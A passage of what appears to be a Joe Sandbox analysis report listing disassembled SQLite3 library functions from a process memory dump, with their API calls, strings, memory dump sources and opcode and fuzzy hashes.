                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                                  • String ID:
                                                                                                  • API String ID: 1894464702-0
                                                                                                  • Opcode ID: 43dbb55e63d06c013fbc7cfb57ba15440cdc9f68e17d7b83426b1cf912bbb11e
                                                                                                  • Instruction ID: 1220cabbe042678955ade0df421e65331f42f6ed591cd03fae00b04e0ad25455
                                                                                                  • Opcode Fuzzy Hash: 43dbb55e63d06c013fbc7cfb57ba15440cdc9f68e17d7b83426b1cf912bbb11e
                                                                                                  • Instruction Fuzzy Hash: 37315970F04A428BD704DFB9D4C0A0ABBF6AFC5358B29C46DD9458B315EB31E8828BD1
                                                                                                  Function 61E1DB55 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_malloc.SQLITE3 ref: 61E1DB65
                                                                                                    • Part of subcall function 61E18D74: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E189FE,?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18D7C
                                                                                                  • memcmp.MSVCRT ref: 61E1DBD7
                                                                                                  • memcmp.MSVCRT ref: 61E1DBFC
                                                                                                  • memcmp.MSVCRT ref: 61E1DC2D
                                                                                                  • memcmp.MSVCRT ref: 61E1DC59
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcmp$sqlite3_initializesqlite3_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 40721531-0
                                                                                                  • Opcode ID: d08c557a831ad9c47cfdc8d0acd10e3429a037171a0bfae2c5590f57de59bb13
                                                                                                  • Instruction ID: 9529ebfa34f57c694d8176e58fae64c06377a46b1b246974a84dc86118f1384a
                                                                                                  • Opcode Fuzzy Hash: d08c557a831ad9c47cfdc8d0acd10e3429a037171a0bfae2c5590f57de59bb13
                                                                                                  • Instruction Fuzzy Hash: 9C316E74A082058BE7089FA9C58975EBBF6BBC4318F21C82DD8458B358D7B5D4828B42
                                                                                                  Function 61E2AD2A Relevance: 7.6, APIs: 5, Instructions: 92COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_log.SQLITE3 ref: 61E2AD58
                                                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,61E2AE73), ref: 61E2AD6C
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E2AE73), ref: 61E2AD94
                                                                                                  • sqlite3_log.SQLITE3 ref: 61E2ADB2
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E2AE73), ref: 61E2ADE8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_logsqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                                  • String ID:
                                                                                                  • API String ID: 1015584638-0
                                                                                                  • Opcode ID: 6ff02bcdaa55ea880ab10f2531afb0e4452d76c4358417a0ecae82fdfb9a755f
                                                                                                  • Instruction ID: 8e0e964c920fce6fc5688c402c79e5ebf8ac5a55b22a0c8739d84582a0e33667
                                                                                                  • Opcode Fuzzy Hash: 6ff02bcdaa55ea880ab10f2531afb0e4452d76c4358417a0ecae82fdfb9a755f
                                                                                                  • Instruction Fuzzy Hash: 25313031608A418BDB009F68C4D074A7BE2EFC6319F29C86DEC548F369D734D892C752
                                                                                                  Function 61E478EC Relevance: 7.6, APIs: 5, Instructions: 76COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E47901
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E4790C
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E479C5
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E479D0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1477753154-0
                                                                                                  • Opcode ID: 7b52b2ebb95233b40fd73ccdf84ed1881a69a7429dded35d59dc5c28e33e388f
                                                                                                  • Instruction ID: daa77b71880301936ab054c3db4069d9e28012cd710ad5bcff7adb936ab82085
                                                                                                  • Opcode Fuzzy Hash: 7b52b2ebb95233b40fd73ccdf84ed1881a69a7429dded35d59dc5c28e33e388f
                                                                                                  • Instruction Fuzzy Hash: 66216BB8A087518BD7019F68D08061ABBF0FF89318F2AC85DDD888B305D774E851CBD2
                                                                                                  Function 61E37063 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_initialize.SQLITE3 ref: 61E37071
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18866
                                                                                                    • Part of subcall function 61E1882F: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E236D5), ref: 61E1889A
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B72
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E37089
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E370AC
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E370F0
                                                                                                  • sqlite3_memory_used.SQLITE3 ref: 61E370F5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_configsqlite3_initializesqlite3_memory_used
                                                                                                  • String ID:
                                                                                                  • API String ID: 2853221962-0
                                                                                                  • Opcode ID: 568a20ca79707b09826e7764169f3d2f824a62bb5cd187b1621bc7aaf6661607
                                                                                                  • Instruction ID: 5e7349674ed52e04f5f0ab7f26fbc5b041e84710451b1ffa60447d6c98e75b19
                                                                                                  • Opcode Fuzzy Hash: 568a20ca79707b09826e7764169f3d2f824a62bb5cd187b1621bc7aaf6661607
                                                                                                  • Instruction Fuzzy Hash: 95114835E54B168BCB04DFB8C89056EB7F2ABCA314B248229E854CB350D7B0E885CB80
                                                                                                  Function 61E0AB1C Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,61E13A99), ref: 61E0AB46
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,61E13A99), ref: 61E0AB82
                                                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,61E13A99), ref: 61E0AB9B
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,61E13A99), ref: 61E0ABAE
                                                                                                  • sqlite3_free.SQLITE3(?,?,?,61E13A99), ref: 61E0ABB6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 251237202-0
                                                                                                  • Opcode ID: b7a4f35d8d33ca32c1991c793023a37f13c0beb693a6fbbf6995c383544afb7e
                                                                                                  • Instruction ID: 0f6c12f8af5b56b9377f6d76b101b1db129d68c26963f626b0986f3c82dcff3d
                                                                                                  • Opcode Fuzzy Hash: b7a4f35d8d33ca32c1991c793023a37f13c0beb693a6fbbf6995c383544afb7e
                                                                                                  • Instruction Fuzzy Hash: 4E11E2769E4B518FCB00AFB9C4C08287BF4EB8635AB15482AD449CB321E779C4949B42
                                                                                                  Function 61E35184 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 331COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E34D92: sqlite3_realloc64.SQLITE3(?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000000,?,61E3519F), ref: 61E34CE5
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E35390
                                                                                                  • sqlite3_log.SQLITE3 ref: 61E35411
                                                                                                    • Part of subcall function 61E090F4: memcmp.MSVCRT ref: 61E0914E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcmpsqlite3_freesqlite3_logsqlite3_realloc64
                                                                                                  • String ID:
                                                                                                  • API String ID: 167025251-3916222277
                                                                                                  • Opcode ID: fa5a4a1aaf05c15df15842f5f68b6a842bb32035f8e82cf148275e8a33685f69
                                                                                                  • Instruction ID: 05d689d0756adf30508b1872fd95b9b095ee7f8286179bcd00281dda828df790
                                                                                                  • Opcode Fuzzy Hash: fa5a4a1aaf05c15df15842f5f68b6a842bb32035f8e82cf148275e8a33685f69
                                                                                                  • Instruction Fuzzy Hash: FEE11770A043598FEB14CFA9C88478DBBF1AF88318F24C569D859AB396E774D885CF40
                                                                                                  Function 61E289B6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_free$sqlite3_win32_is_nt
                                                                                                  • String ID: winAccess
                                                                                                  • API String ID: 2284118020-3605117275
                                                                                                  • Opcode ID: 6267be8bda4109b66db814f2d6d4ebb383304d6baac33ac351b94171b6d6c4c5
                                                                                                  • Instruction ID: d30b5177c5328d71f16359807caca135c98dd467fd92055c6d4274a44695a23d
                                                                                                  • Opcode Fuzzy Hash: 6267be8bda4109b66db814f2d6d4ebb383304d6baac33ac351b94171b6d6c4c5
                                                                                                  • Instruction Fuzzy Hash: 6431B8B1A05249CFEB509FA8C850B5EB7F1FB85328F25C929D8649B380DB34D846DB52
                                                                                                  Function 61E6107B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 3$d
                                                                                                  • API String ID: 0-1650181692
                                                                                                  • Opcode ID: 67aad7a9a0400007d543484fb71d23f6d820fe852bc348775cf97d4475577844
                                                                                                  • Instruction ID: 55a9cc43651ed70d43e838f31caf9ff2cbcb5e703cfb155629d202a4f1b5d9db
                                                                                                  • Opcode Fuzzy Hash: 67aad7a9a0400007d543484fb71d23f6d820fe852bc348775cf97d4475577844
                                                                                                  • Instruction Fuzzy Hash: 3A315C70A042548FDB22CFA5C880789BBF4FB46318F6485AAD8999B345D374E980CFD1
                                                                                                  Function 61E1CD0F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_malloc.SQLITE3 ref: 61E1CD2D
                                                                                                    • Part of subcall function 61E18D74: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E189FE,?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18D7C
                                                                                                  • sqlite3_realloc.SQLITE3 ref: 61E1CD7B
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E1CD91
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                                  • String ID: d
                                                                                                  • API String ID: 211589378-2564639436
                                                                                                  • Opcode ID: 8a173bfbe0902d2dee43b50e39e33b9348f2359d484d124bfbddc1d498228a9f
                                                                                                  • Instruction ID: 186a9503666e3551159deb7e988708b355772da0e80bd14209b2cc845ce353ff
                                                                                                  • Opcode Fuzzy Hash: 8a173bfbe0902d2dee43b50e39e33b9348f2359d484d124bfbddc1d498228a9f
                                                                                                  • Instruction Fuzzy Hash: B52100B1A08205CFDB00CF69C4C1B8ABBF4AF89314F648469C9489B319E778E845CBA1
                                                                                                  Function 61E1FE55 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_aggregate_context.SQLITE3 ref: 61E1FE6C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_aggregate_context
                                                                                                  • String ID: "$,$\
                                                                                                  • API String ID: 2928764607-4027707629
                                                                                                  • Opcode ID: 985750401d6e333385aa22fae31d137fd42ade832726c974970416d6b5b12ab4
                                                                                                  • Instruction ID: 8dc02fc07ea195d6aa8ded8b2cf6460c84eeabe353aeb0c13fea9a3048a38754
                                                                                                  • Opcode Fuzzy Hash: 985750401d6e333385aa22fae31d137fd42ade832726c974970416d6b5b12ab4
                                                                                                  • Instruction Fuzzy Hash: 29112772E092148FD7048F69D48179ABFA5FF88724F19C12AE8088B356C339D945CBD0
                                                                                                  Function 61E20C00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_value_int$sqlite3_result_blob
                                                                                                  • String ID: <
                                                                                                  • API String ID: 2918918774-4251816714
                                                                                                  • Opcode ID: 1b6c78369e8677f43422a24d4d63817df5d9dabed496726570e73817e82e1b76
                                                                                                  • Instruction ID: 241d78d8769ad858d22b6a3d2f7a7971869353dbccfd7da2c35b0a23e4ce016c
                                                                                                  • Opcode Fuzzy Hash: 1b6c78369e8677f43422a24d4d63817df5d9dabed496726570e73817e82e1b76
                                                                                                  • Instruction Fuzzy Hash: CA116AB59043068FCB04DF6AD48098ABBF5FF88364F15C56AE4488B361E334E951CF91
                                                                                                  Function 61E2ACAF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E2ABA3: sqlite3_log.SQLITE3(?,?,?,?,?,61E2AC56), ref: 61E2ABDE
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E2ACE2
                                                                                                  • sqlite3_value_text.SQLITE3 ref: 61E2ACFB
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E2AD15
                                                                                                    • Part of subcall function 61E27C83: sqlite3_log.SQLITE3 ref: 61E27CAC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_log$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_value_text
                                                                                                  • String ID: out of memory
                                                                                                  • API String ID: 645246966-2599737071
